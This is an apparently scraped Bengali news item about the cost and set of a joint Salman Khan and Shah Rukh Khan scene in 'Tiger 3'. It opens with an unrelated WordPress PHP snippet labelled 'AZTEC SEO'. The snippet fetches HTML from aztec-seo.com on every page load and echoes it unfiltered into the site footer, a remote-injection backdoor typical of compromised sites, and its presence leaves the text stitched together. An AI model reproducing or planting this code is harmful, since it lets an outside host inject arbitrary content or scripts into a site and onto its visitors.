/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
‘পাঠান’ এর পর ‘টাইগার ৩’ তে অ্যাকশন দৃশ্যে দেখা যাবে বলিউডের সবচেয়ে বড় দুই তারকাকে। ‘টাইগার ৩’ সিনেমার শুটিং শেষ হয়ে গেলেও এখনো সালমান-শাহরুখের এই দৃশ্য ধারণ করা হয়নি। গত মাসে শুটিং হওয়ার কথা থাকলেও তা পিছিয়ে গেছে। চলতি মাসের ৮ তারিখ শুটিংয়ে একসঙ্গে দেখা যাবে এই দুই তারকাকে।
আপনি কি জানেন, সালমান-শাহরুখের এই দৃশ্য ধারণ করতে কত টাকা খরচ করতে হচ্ছে নির্মাতাদের?
দুই খানকে একসঙ্গে উপস্থাপনের জন্য ৩৫ কোটি রুপি খরচ করছেন নির্মাতারা, যা বাংলাদেশি টাকায় প্রায় ৪৬ কোটি টাকা। এই দৃশ্য ধারণ করার জন্য দীর্ঘ ৪৫ দিন ধরে মুম্বাইয়ে নির্মাণ করা হয়েছে বিশাল এক সেট। খবর পিংক ভিলার
অনেক দিন ধরে বলিউডে চলছিল মন্দা। এরপরই শাহরুখ নিয়ে এলেন ‘পাঠান’। সিনেমায় অতিথি চরিত্রে এসেছিলেন সালমান খান।